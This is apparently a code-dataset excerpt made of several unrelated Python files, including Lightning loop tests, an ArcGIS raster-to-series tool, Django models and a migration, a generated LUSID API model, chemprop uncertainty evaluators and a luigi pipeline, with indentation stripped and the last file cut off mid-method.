loop_amount = 250000
alice, bob = setup_nodes(bitcoind, [alice, bob])
if alice.daemon.invoice_rpc_active:
quote = loopd.loop_out_quote(amt=loop_amount)
assert quote is not None
assert isinstance(quote, loop_client_pb2.QuoteResponse)
else:
logging.info("test_loop_out() skipped as invoice RPC not detected")
@pytest.mark.skip(reason="waiting to configure loop swapserver")
def test_loop_out_terms(self, bitcoind, alice, bob, loopd):
alice, bob = setup_nodes(bitcoind, [alice, bob])
if alice.daemon.invoice_rpc_active:
terms = loopd.loop_out_terms()
assert terms is not None
assert isinstance(terms, loop_client_pb2.TermsResponse)
else:
logging.info("test_loop_out() skipped as invoice RPC not detected")
|
python
|
#!c:/Python26/ArcGIS10.0/python.exe
# -*- coding: utf-8 -*-
#COPYRIGHT 2016 igsnrr
#
#MORE INFO ...
#email:
"""The tool is designed to convert Arcgis Grid file to Series."""
# ######!/usr/bin/python
import sys,os
import numpy as np
import arcpy
from arcpy.sa import *
from arcpy import env
import shutil
import time
from toolbase import ToolBase
from series import SeriesWithLocation
"""Tool for Converting ESRI Grid Fiels to Series"""
class Grid2SeriesConverterTool(ToolBase):
def __init__(self):
ToolBase.__init__(self, "Grid2SeriesConverterTool", "The Grid2SeriesConverterTool is to convert Arcgis grd file to series flat files.")
self._version = "grid2seriestool.py 0.0.1"
def defineArgumentParser(self, parser):
parser.add_argument("source", action="store", help="root dir for source files")
parser.add_argument("mask", action="store", help="mask file for grd files")
parser.add_argument("target", action="store", help="root dir for source files")
parser.add_argument("-t","--tempDir", dest="tempDir", action="store", help="root dir for temporary files")
parser.add_argument("-i", "--include", dest="include", action="store", help="file for storing valid files list")
parser.add_argument("-e", "--exclude", dest="exclude", action="store", help="file for storing excluesive files list")
""" main route for processing """
def run(self, args):
srcRoot = args.source
maskPath = args.mask
targetRoot = args.target
tempDir = args.tempDir
inclusiveFilesPath = args.include
exclusiveFilesPath = args.exclude
targetPathRoot = os.path.dirname(targetRoot)
if not os.path.exists(targetPathRoot):
os.makedirs(targetPathRoot)
self._logger.info("Starting: Batch process for converting grids to series.")
self.setupProcessEnv(tempDir)
self.batchProcess(srcRoot, maskPath, targetRoot, inclusiveFilesPath, exclusiveFilesPath)
self._logger.info("Finished: Batch process for converting grids to series.")
def batchProcess(self, srcPathRoot, maskPath, targetPath, inclusiveFileListPath=None, exclusiveFilePath=None):
# loading data and mask files
self.loadBatchFileList(srcPathRoot, inclusiveFileListPath, exclusiveFilePath)
maskRaster = self.loadMaskRaster(maskPath)
dataRasters = self.loadDataFilesAsRasterArray(srcPathRoot, maskRaster)
if len(dataRasters) < 1:
print("No Raster Series and nothing is processed.")
return
# todo what you like with raster Array
self.doCustomProcessWithRasters(dataRasters)
# convert series format from rasters
seriesArray = self.rasters2Series(dataRasters)
# todo what you like with series Array
self.doCustomProcessWithSeriesArray(seriesArray)
self.saveSeries(seriesArray, targetPath)
gridFilePath = os.path.join(self.tempDir, "indexgrd")
self.saveIndexedGrid( seriesArray,dataRasters[0], gridFilePath)
def setupProcessEnv(self, tempDir):
arcpy.env.overwriteOutput = True
# Set environment settings
self.tempDir = tempDir
if self.tempDir is None:
self.tempDir = os.path.join(os.getcwd(),"temp")
if not os.path.exists(self.tempDir):
os.makedirs(self.tempDir)
# env.workspace = tempDir
""" Do custom processing whatever you want with raster array and return result in any format."""
def doCustomProcessWithRasters(self,rasters):
self._logger.info("Do custom processing whatever you want with raster array and return result in any format.")
pass;
""" Do custom processing whatever you want with the series.py data array and return result in any format."""
def doCustomProcessWithSeriesArray(self, seriesArray):
self._logger.info("Do custom processing whatever you want with the series array and return result in any format.")
pass;
"""" Convert Raster Array into SeriesArray like a table without header, format: index, i, j, x, y, v1,v2,... """
def rasters2Series(self, dataRasters):
self._logger.info("Converting rasters into series ...")
dataNpArray = self.rasters2NumPyArray(dataRasters)
raster = dataRasters[0]
extent = raster.extent
cellWidth = raster.meanCellWidth
cellHeight = raster.meanCellHeight
noDataValue = raster.noDataValue
row = raster.height
col = raster.width
index = 0
i = 0
j = 0
seriesArray = []
for i in range(row):
y = extent.YMax - cellHeight * (i + 0.5)
for j in range(col):
if (dataNpArray[0, i, j] != noDataValue):
x = extent.XMin + cellWidth * (j + 0.5)
index += 1
series = dataNpArray[:, i, j]
seriesArray.append(SeriesWithLocation(index, i, j, x, y, series))
self._logger.info("Done: converting rasters into series ...")
return seriesArray
def rasters2NumPyArray(self, rasters):
dataArray = []
for i in range(len(rasters)):
dataArray.append(arcpy.RasterToNumPyArray(rasters[i]))
data = np.array(dataArray)
return data
"""Save series.py to text files in table format."""
def saveSeries(self, seriesArray, targetPath):
dir = os.path.dirname(targetPath)
if not os.path.exists(dir):
os.mkdir(dir)
with open(targetPath, "w") as fts:
for ii in range(len(seriesArray)):
series = seriesArray[ii].toString
fts.write(series)
"""Exclude the files in the list load from configue file for exclusive items"""
def loadBatchFileList(self, srcPathRoot, inclusiveFilesPath=None, exclusiveFilesPath=None):
self._taskList = []
if inclusiveFilesPath is None:
arcpy.env.workspace = srcPathRoot
self._taskList = arcpy.ListRasters("*", "GRID")
for rasterFile in self._taskList:
print("Loading %s" % rasterFile)
# self._logger.info(rasterFile)
else:
with open(inclusiveFilesPath) as fbo:
for line in fbo.readlines():
self._taskList.append(line.strip('\n'))
self._taskExclusiveList = []
if exclusiveFilesPath is None:
return
with open(exclusiveFilesPath) as feo:
for line in feo.readlines():
self._taskExclusiveList.append(line.strip('\n'))
"""Open and load the files in the list clipped with mask, return as Raster Array"""
def loadDataFilesAsRasterArray(self, srcPathRoot, maskRaster):
if not maskRaster is None:
# Check out the ArcGIS Spatial Analyst extension license
arcpy.CheckOutExtension("Spatial")
rasters = []
for item in self._taskList:
if item not in self._taskExclusiveList:
srcPath = os.path.join(srcPathRoot, item)
if arcpy.Exists(srcPath):
raster = arcpy.sa.Raster(srcPath)
if not maskRaster is None:
raster = arcpy.sa.ExtractByMask(raster, maskRaster)
rasters.append(raster)
else:
print("Raster %s doesn't exist! check it please." % item)
return rasters
def loadMaskRaster(self, maskPath):
if not os.path.exists(maskPath):
self._logger.error("Mask raster file is missing or incorrect! Correct it and run again.")
maskRaster = arcpy.sa.Raster(maskPath)
# self.printMask(maskArray)
return maskRaster
"""" Create grid index by the series's index, x, y. """
def saveIndexedGrid(self,seriesArray, refRaster, gridFilePath ):
self._logger.info("Saving Index Grid ...")
# gridArray = np.zeros((refRaster.height, refRaster.width), dtype=np.int64)
gridArray = np.zeros((refRaster.height, refRaster.width),dtype=np.int)
for ii in range(len(seriesArray)):
s = seriesArray[ii]
gridArray[s.i, s.j] = s.index
# Convert array to a geodatabase raster
gridRaster = arcpy.NumPyArrayToRaster(gridArray, refRaster.extent.lowerLeft, refRaster.meanCellWidth, refRaster.meanCellHeight, 0)
gridRaster.save(gridFilePath)
self._logger.info("Done: saving Index Grid ...")
del gridRaster
def printMask(self, maskRaster):
maskArray = arcpy.RasterToNumPyArray(maskRaster)
row, col = maskArray.shape
print("row:%d col%d" %(row, col))
workspace = os.getcwd()
txmaskfile = os.path.join(self.tempDir , "txmask.txt")
print("write mask file in text %s", txmaskfile)
with open(txmaskfile, "w") as fts:
for i in range(row):
strMask = u"{}\n".format(("%s" % maskArray[i]).strip("[]"))
fts.write(strMask)
if __name__ == "__main__":
# testing code
tool = Grid2SeriesConverterTool()
import argparse
from logger import Logger
parser = argparse.ArgumentParser(prog="python.exe grid2seriestool.py", description="Grid2SeriesConverterTool Usage Guide", prefix_chars="-+")
parser.add_argument("--version", action="version", version="%(prog)s 0.0.1")
tool.defineArgumentParser(parser)
logger = Logger("log/g2s.log")
tool.attachLogger(logger)
args = parser.parse_args()
# print(args)
tool.run(args)
else:
print("loading grid2seriestool module")
|
python
|
# Generated by Django 2.0.7 on 2018-09-03 02:40
from django.db import migrations
import django.db.models.deletion
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('zinnia-threaded-comments', '0002_migrate_comments'),
]
operations = [
migrations.AlterField(
model_name='threadedcomment',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='children', to='zinnia-threaded-comments.ThreadedComment', verbose_name='reply in comment'),
),
]
|
python
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.2321
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class QuoteSeriesId(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'provider': 'str',
'price_source': 'str',
'instrument_id': 'str',
'instrument_id_type': 'str',
'quote_type': 'str',
'field': 'str'
}
attribute_map = {
'provider': 'provider',
'price_source': 'priceSource',
'instrument_id': 'instrumentId',
'instrument_id_type': 'instrumentIdType',
'quote_type': 'quoteType',
'field': 'field'
}
required_map = {
'provider': 'required',
'price_source': 'optional',
'instrument_id': 'required',
'instrument_id_type': 'required',
'quote_type': 'required',
'field': 'required'
}
def __init__(self, provider=None, price_source=None, instrument_id=None, instrument_id_type=None, quote_type=None, field=None): # noqa: E501
"""
QuoteSeriesId - a model defined in OpenAPI
:param provider: The platform or vendor that provided the quote, e.g. 'DataScope', 'LUSID' etc. (required)
:type provider: str
:param price_source: The source or originator of the quote, e.g. a bank or financial institution.
:type price_source: str
:param instrument_id: The value of the instrument identifier that uniquely identifies the instrument that the quote is for, e.g. 'BBG00JX0P539'. (required)
:type instrument_id: str
:param instrument_id_type: The type of instrument identifier used to uniquely identify the instrument that the quote is for, e.g. 'Figi'. The available values are: LusidInstrumentId, Figi, RIC, QuotePermId, Isin, CurrencyPair (required)
:type instrument_id_type: str
:param quote_type: The type of the quote. This allows for quotes other than prices e.g. rates or spreads to be used. The available values are: Price, Spread, Rate, LogNormalVol, NormalVol, ParSpread, IsdaSpread, Upfront (required)
:type quote_type: str
:param field: The field of the quote e.g. bid, mid, ask etc. This should be consistent across a time series of quotes. The allowed values are dependant on the specified Provider. (required)
:type field: str
""" # noqa: E501
self._provider = None
self._price_source = None
self._instrument_id = None
self._instrument_id_type = None
self._quote_type = None
self._field = None
self.discriminator = None
self.provider = provider
self.price_source = price_source
self.instrument_id = instrument_id
self.instrument_id_type = instrument_id_type
self.quote_type = quote_type
self.field = field
@property
def provider(self):
"""Gets the provider of this QuoteSeriesId. # noqa: E501
The platform or vendor that provided the quote, e.g. 'DataScope', 'LUSID' etc. # noqa: E501
:return: The provider of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._provider
@provider.setter
def provider(self, provider):
"""Sets the provider of this QuoteSeriesId.
The platform or vendor that provided the quote, e.g. 'DataScope', 'LUSID' etc. # noqa: E501
:param provider: The provider of this QuoteSeriesId. # noqa: E501
:type: str
"""
if provider is None:
raise ValueError("Invalid value for `provider`, must not be `None`") # noqa: E501
self._provider = provider
@property
def price_source(self):
"""Gets the price_source of this QuoteSeriesId. # noqa: E501
The source or originator of the quote, e.g. a bank or financial institution. # noqa: E501
:return: The price_source of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._price_source
@price_source.setter
def price_source(self, price_source):
"""Sets the price_source of this QuoteSeriesId.
The source or originator of the quote, e.g. a bank or financial institution. # noqa: E501
:param price_source: The price_source of this QuoteSeriesId. # noqa: E501
:type: str
"""
self._price_source = price_source
@property
def instrument_id(self):
"""Gets the instrument_id of this QuoteSeriesId. # noqa: E501
The value of the instrument identifier that uniquely identifies the instrument that the quote is for, e.g. 'BBG00JX0P539'. # noqa: E501
:return: The instrument_id of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._instrument_id
@instrument_id.setter
def instrument_id(self, instrument_id):
"""Sets the instrument_id of this QuoteSeriesId.
The value of the instrument identifier that uniquely identifies the instrument that the quote is for, e.g. 'BBG00JX0P539'. # noqa: E501
:param instrument_id: The instrument_id of this QuoteSeriesId. # noqa: E501
:type: str
"""
if instrument_id is None:
raise ValueError("Invalid value for `instrument_id`, must not be `None`") # noqa: E501
self._instrument_id = instrument_id
@property
def instrument_id_type(self):
"""Gets the instrument_id_type of this QuoteSeriesId. # noqa: E501
The type of instrument identifier used to uniquely identify the instrument that the quote is for, e.g. 'Figi'. The available values are: LusidInstrumentId, Figi, RIC, QuotePermId, Isin, CurrencyPair # noqa: E501
:return: The instrument_id_type of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._instrument_id_type
@instrument_id_type.setter
def instrument_id_type(self, instrument_id_type):
"""Sets the instrument_id_type of this QuoteSeriesId.
The type of instrument identifier used to uniquely identify the instrument that the quote is for, e.g. 'Figi'. The available values are: LusidInstrumentId, Figi, RIC, QuotePermId, Isin, CurrencyPair # noqa: E501
:param instrument_id_type: The instrument_id_type of this QuoteSeriesId. # noqa: E501
:type: str
"""
allowed_values = [None,"LusidInstrumentId", "Figi", "RIC", "QuotePermId", "Isin", "CurrencyPair"] # noqa: E501
if instrument_id_type not in allowed_values:
raise ValueError(
"Invalid value for `instrument_id_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_id_type, allowed_values)
)
self._instrument_id_type = instrument_id_type
@property
def quote_type(self):
"""Gets the quote_type of this QuoteSeriesId. # noqa: E501
The type of the quote. This allows for quotes other than prices e.g. rates or spreads to be used. The available values are: Price, Spread, Rate, LogNormalVol, NormalVol, ParSpread, IsdaSpread, Upfront # noqa: E501
:return: The quote_type of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._quote_type
@quote_type.setter
def quote_type(self, quote_type):
"""Sets the quote_type of this QuoteSeriesId.
The type of the quote. This allows for quotes other than prices e.g. rates or spreads to be used. The available values are: Price, Spread, Rate, LogNormalVol, NormalVol, ParSpread, IsdaSpread, Upfront # noqa: E501
:param quote_type: The quote_type of this QuoteSeriesId. # noqa: E501
:type: str
"""
allowed_values = [None,"Price", "Spread", "Rate", "LogNormalVol", "NormalVol", "ParSpread", "IsdaSpread", "Upfront"] # noqa: E501
if quote_type not in allowed_values:
raise ValueError(
"Invalid value for `quote_type` ({0}), must be one of {1}" # noqa: E501
.format(quote_type, allowed_values)
)
self._quote_type = quote_type
@property
def field(self):
"""Gets the field of this QuoteSeriesId. # noqa: E501
The field of the quote e.g. bid, mid, ask etc. This should be consistent across a time series of quotes. The allowed values are dependant on the specified Provider. # noqa: E501
:return: The field of this QuoteSeriesId. # noqa: E501
:rtype: str
"""
return self._field
@field.setter
def field(self, field):
"""Sets the field of this QuoteSeriesId.
The field of the quote e.g. bid, mid, ask etc. This should be consistent across a time series of quotes. The allowed values are dependant on the specified Provider. # noqa: E501
:param field: The field of this QuoteSeriesId. # noqa: E501
:type: str
"""
if field is None:
raise ValueError("Invalid value for `field`, must not be `None`") # noqa: E501
self._field = field
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QuoteSeriesId):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
python
|
import unittest
from messages.message import Message
from messages.option import Option
from messages import Options
import defines
class Tests(unittest.TestCase):
# def setUp(self):
# self.server_address = ("127.0.0.1", 5683)
# self.current_mid = random.randint(1, 1000)
# self.server_mid = random.randint(1000, 2000)
# self.server = CoAPServer("127.0.0.1", 5683)
# self.server_thread = threading.Thread(target=self.server.listen, args=(1,))
# self.server_thread.start()
# self.queue = Queue()
#
# def tearDown(self):
# self.server.close()
# self.server_thread.join(timeout=25)
# self.server = None
def test_create_options(self):
m = Message()
o = Options()
o.accept = 10000
# setattr(o, 'accept', 10000)
option = Option()
option.number = defines.OptionRegistry.ACCEPT.number
option.value = 10000
|
python
|
from django.core.validators import MinLengthValidator
from django.db import models
class Design(models.Model):
TYPE_CHOICE_INTERIOR = 'interior'
TYPE_CHOICE_PRODUCT = 'product'
TYPE_CHOICE_3D = '3d'
TYPE_CHOICE_OTHER = 'other'
TYPE_CHOICES = (
(TYPE_CHOICE_INTERIOR, 'Interior design'),
(TYPE_CHOICE_PRODUCT, 'Product design'),
(TYPE_CHOICE_3D, '3D visualizations'),
(TYPE_CHOICE_OTHER, 'Other'),
)
type = models.CharField(
max_length=20,
choices=TYPE_CHOICES,
default='Other',
)
title = models.CharField(
max_length=25,
)
city = models.CharField(
max_length=15,
)
country = models.CharField(
max_length=20,
)
description = models.TextField(
validators=[
MinLengthValidator(25)
],
)
image = models.ImageField(
upload_to='designs',
null=True,
blank=True,
)
class Like(models.Model):
design = models.ForeignKey(
Design,
on_delete=models.CASCADE,
)
|
python
|
from abc import ABC, abstractmethod
from typing import List
import numpy as np
from scipy.stats import t, spearmanr
from scipy.special import erfinv
from chemprop.uncertainty.uncertainty_calibrator import UncertaintyCalibrator
from chemprop.train import evaluate_predictions
class UncertaintyEvaluator(ABC):
"""
A class for evaluating the effectiveness of uncertainty estimates with metrics.
"""
def __init__(
self,
evaluation_method: str,
calibration_method: str,
uncertainty_method: str,
dataset_type: str,
loss_function: str,
calibrator: UncertaintyCalibrator,
):
self.evaluation_method = evaluation_method
self.calibration_method = calibration_method
self.uncertainty_method = uncertainty_method
self.dataset_type = dataset_type
self.loss_function = loss_function
self.calibrator = calibrator
self.raise_argument_errors()
def raise_argument_errors(self):
"""
Raise errors for incompatibilities between dataset type and uncertainty method, or similar.
"""
if self.dataset_type == "spectra":
raise NotImplementedError(
"No uncertainty evaluators implemented for spectra dataset type."
)
if self.uncertainty_method in ['ensemble', 'dropout'] and self.dataset_type in ['classification', 'multiclass']:
raise NotImplementedError(
'Though ensemble and dropout uncertainty methods are available for classification \
multiclass dataset types, their outputs are not confidences and are not \
compatible with any implemented evaluation methods for classification.'
)
@abstractmethod
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
) -> List[float]:
"""
Evaluate the performance of uncertainty predictions against the model target values.
:param targets: The target values for prediction.
:param preds: The prediction values of a model on the test set.
:param uncertainties: The estimated uncertainty values, either calibrated or uncalibrated, of a model on the test set.
:return: A list of metric values for each model task.
"""
class MetricEvaluator(UncertaintyEvaluator):
"""
A class for evaluating confidence estimates of classification and multiclass datasets using builtin evaluation metrics.
"""
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
return evaluate_predictions(
preds=uncertainties,
targets=targets,
num_tasks=np.array(targets).shape[1],
metrics=[self.evaluation_method],
dataset_type=self.dataset_type,
)[self.evaluation_method]
class NLLRegressionEvaluator(UncertaintyEvaluator):
"""
A class for evaluating regression uncertainty values using the mean negative-log-likelihood
of the actual targets given the probability distributions estimated by the model.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise ValueError(
"NLL Regression Evaluator is only for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
if self.calibrator is None: # uncalibrated regression uncertainties are variances
uncertainties = np.array(uncertainties)
preds = np.array(preds)
targets = np.array(targets)
nll = np.log(2 * np.pi * uncertainties) / 2 \
+ (preds - targets) ** 2 / (2 * uncertainties)
return np.mean(nll, axis=0).tolist()
else:
nll = self.calibrator.nll(
preds=preds, unc=uncertainties, targets=targets
) # shape(data, task)
return np.mean(nll, axis=0).tolist()
class NLLClassEvaluator(UncertaintyEvaluator):
"""
A class for evaluating classification uncertainty values using the mean negative-log-likelihood
of the actual targets given the probabilities assigned to them by the model.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "classification":
raise ValueError(
"NLL Classification Evaluator is only for classification dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets)
uncertainties = np.array(uncertainties)
likelihood = uncertainties * targets + (1 - uncertainties) * (1 - targets)
nll = -1 * np.log(likelihood)
return np.mean(nll, axis=0).tolist()
class NLLMultiEvaluator(UncertaintyEvaluator):
"""
A class for evaluating multiclass uncertainty values using the mean negative-log-likelihood
of the actual targets given the probabilities assigned to them by the model.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "multiclass":
raise ValueError(
"NLL Multiclass Evaluator is only for multiclass dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets, dtype=int) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
nll = np.zeros_like(targets)
for i in range(targets.shape[1]):
task_preds = uncertainties[:, i]
task_targets = targets[:, i] # shape(data)
bin_targets = np.zeros_like(preds[:, 0, :]) # shape(data, classes)
bin_targets[np.arange(targets.shape[0]), task_targets] = 1
task_likelihood = np.sum(bin_targets * task_preds, axis=1)
task_nll = -1 * np.log(task_likelihood)
nll[:, i] = task_nll
return np.mean(nll, axis=0).tolist()
class CalibrationAreaEvaluator(UncertaintyEvaluator):
"""
A class for evaluating regression uncertainty values based on how they deviate from perfect
calibration on an observed-probability versus expected-probability plot.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise NotImplementedError(
f"Miscalibration area is only implemented for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
abs_error = np.abs(preds - targets) # shape(data, tasks)
fractions = np.zeros([preds.shape[1], 101]) # shape(tasks, 101)
fractions[:, 100] = 1
if self.calibrator is not None:
# using 101 bin edges, hardcoded
original_metric = self.calibrator.regression_calibrator_metric
original_scaling = self.calibrator.scaling
original_interval = self.calibrator.interval_percentile
for i in range(1, 100):
self.calibrator.regression_calibrator_metric = "interval"
self.calibrator.interval_percentile = i
self.calibrator.calibrate()
bin_scaling = self.calibrator.scaling
bin_unc = (
uncertainties
/ np.expand_dims(original_scaling, axis=0)
* np.expand_dims(bin_scaling, axis=0)
) # shape(data, tasks)
bin_fraction = np.mean(bin_unc >= abs_error, axis=0)
fractions[:, i] = bin_fraction
self.calibrator.regression_calibrator_metric = original_metric
self.calibrator.scaling = original_scaling
self.calibrator.interval_percentile = original_interval
else: # uncertainties are uncalibrated variances
std = np.sqrt(uncertainties)
for i in range(1, 100):
bin_scaling = erfinv(i / 100) * np.sqrt(2)
bin_unc = std * bin_scaling
bin_fraction = np.mean(bin_unc >= abs_error, axis=0)
fractions[:, i] = bin_fraction
# trapezoid rule
auce = np.sum(
0.01 * np.abs(fractions - np.expand_dims(np.arange(101) / 100, axis=0)),
axis=1,
)
return auce.tolist()
class ExpectedNormalizedErrorEvaluator(UncertaintyEvaluator):
"""
A class that evaluates uncertainty performance by binning together clusters of predictions
and comparing the average predicted variance of the clusters against the RMSE of the cluster.
Method discussed in https://doi.org/10.1021/acs.jcim.9b00975.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise ValueError(
f"Expected normalized error is only appropriate for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
abs_error = np.abs(preds - targets) # shape(data, tasks)
sort_record = np.rec.fromarrays([uncertainties, abs_error], names="i, j")
sort_record.sort(axis=0)
uncertainties = sort_record["i"]
abs_error = sort_record["j"]
# get stdev scaling
if self.calibrator is not None:
original_metric = self.calibrator.regression_calibrator_metric
original_scaling = self.calibrator.scaling
# 100 bins
split_unc = np.array_split(
uncertainties, 100, axis=0
) # shape(list100, data, tasks)
split_error = np.array_split(abs_error, 100, axis=0)
mean_vars = np.zeros([preds.shape[1], 100]) # shape(tasks, 100)
rmses = np.zeros_like(mean_vars)
for i in range(100):
if self.calibrator is None: # starts as a variance
mean_vars[:, i] = np.mean(split_unc[i], axis=0)
rmses[:, i] = np.sqrt(np.mean(np.square(split_error[i]), axis=0))
elif self.calibration_method == "tscaling": # convert back to sample stdev
bin_unc = split_unc[i] / np.expand_dims(original_scaling, axis=0)
bin_var = t.var(df=self.calibrator.num_models - 1, scale=bin_unc)
mean_vars[:, i] = np.mean(bin_var, axis=0)
rmses[:, i] = np.sqrt(np.mean(np.square(split_error[i]), axis=0))
else:
self.calibrator.regression_calibrator_metric = "stdev"
self.calibrator.calibrate()
stdev_scaling = self.calibrator.scaling
self.calibrator.regression_calibrator_metric = original_metric
self.calibrator.scaling = original_scaling
bin_unc = split_unc[i]
bin_unc = (
bin_unc
/ np.expand_dims(original_scaling, axis=0)
* np.expand_dims(stdev_scaling, axis=0)
) # convert from interval to stdev as needed
mean_vars[:, i] = np.mean(np.square(bin_unc), axis=0)
rmses[:, i] = np.sqrt(np.mean(np.square(split_error[i]), axis=0))
ence = np.mean(np.abs(mean_vars - rmses) / mean_vars, axis=1)
return ence.tolist()
class SpearmanEvaluator(UncertaintyEvaluator):
"""
Class evaluating uncertainty performance using the spearman rank correlation. Method produces
better scores (closer to 1 in the [-1, 1] range) when the uncertainty values are predictive
of the ranking of prediciton errors.
"""
def raise_argument_errors(self):
super().raise_argument_errors()
if self.dataset_type != "regression":
raise ValueError(
f"Spearman rank correlation is only appropriate for regression dataset types."
)
def evaluate(
self,
targets: List[List[float]],
preds: List[List[float]],
uncertainties: List[List[float]],
):
targets = np.array(targets) # shape(data, tasks)
uncertainties = np.array(uncertainties)
preds = np.array(preds)
abs_error = np.abs(preds - targets) # shape(data, tasks)
num_tasks = targets.shape[1]
spearman_coeffs = []
for i in range(num_tasks):
spmn = spearmanr(uncertainties[:, i], abs_error[:, i]).correlation
spearman_coeffs.append(spmn)
return spearman_coeffs
def build_uncertainty_evaluator(
evaluation_method: str,
calibration_method: str,
uncertainty_method: str,
dataset_type: str,
loss_function: str,
calibrator: UncertaintyCalibrator,
) -> UncertaintyEvaluator:
"""
Function that chooses and returns the appropriate :class: `UncertaintyEvaluator` subclass
for the provided arguments.
"""
supported_evaluators = {
"nll": {
"regression": NLLRegressionEvaluator,
"classification": NLLClassEvaluator,
"multiclass": NLLMultiEvaluator,
"spectra": None,
}[dataset_type],
"miscalibration_area": CalibrationAreaEvaluator,
"ence": ExpectedNormalizedErrorEvaluator,
"spearman": SpearmanEvaluator,
}
classification_metrics = [
"auc",
"prc-auc",
"accuracy",
"binary_cross_entropy",
"f1",
"mcc",
]
multiclass_metrics = [
"cross_entropy",
"accuracy",
"f1",
"mcc"
]
if dataset_type == "classification" and evaluation_method in classification_metrics:
evaluator_class = MetricEvaluator
elif dataset_type == "multiclass" and evaluation_method in multiclass_metrics:
evaluator_class = MetricEvaluator
else:
evaluator_class = supported_evaluators.get(evaluation_method, None)
if evaluator_class is None:
raise NotImplementedError(
f"Evaluator type {evaluation_method} is not supported. Avalable options are all calibration/multiclass metrics and {list(supported_evaluators.keys())}"
)
else:
evaluator = evaluator_class(
evaluation_method=evaluation_method,
calibration_method=calibration_method,
uncertainty_method=uncertainty_method,
dataset_type=dataset_type,
loss_function=loss_function,
calibrator=calibrator,
)
return evaluator
|
python
|
import json
import glob
import luigi
import os
from dlib.task_helpers import parse_yaml, extract_task_config
from dlib.task_helpers import read_data, generate_output_filename, run_init
from dlib.identifier import Identify
from dlib.parser import Parser
from dlib.process_router import Processor
from dlib.btriples import triplify, storify
'''
pipeline for the demo
1. pull from solr
2. convert
3. identify
4. parse
5. triples
'''
class RawTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
def requires(self):
return []
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'raw'
))
def run(self):
''' '''
self._configure()
data = read_data(self.input_file)
new_data = self.process_response(data)
with self.output().open('w') as out_file:
out_file.write(json.dumps(new_data, indent=4))
def process_response(self, data):
'''
get the sha, the content, the url, and the harvest date
'''
content = data.get('raw_content', '').encode('unicode_escape')
content = content[content.index('<'):]
content = content.replace('\\n', ' ').replace('\\t', ' ')
content = content.replace('\\\\ufffd', ' ').replace('\\ufffd', ' ')
content = ' '.join(content.split())
content = content.strip()
url = data.get('url', '')
sha = data.get('sha', '')
harvest = data.get('tstamp', '')
return {
"content": content,
"url": url,
"sha": sha,
"harvest": harvest,
"digest": data.get("digest")
}
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Raw')
self.output_path = config.get('output_directory', '')
class IdentifyTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
identifiers = []
def requires(self):
return RawTask(input_file=self.input_file, yaml_file=self.yaml_file)
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'identified'
))
def run(self):
''' '''
self._configure()
f = self.input().open('r')
data = json.loads(f.read())
new_data = self.process_response(data)
with self.output().open('w') as out_file:
out_file.write(json.dumps(new_data, indent=4))
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Identify')
self.output_path = config.get('output_directory', '')
self.identifiers = config.get('identifiers', [])
def process_response(self, data):
''' check against the yaml config '''
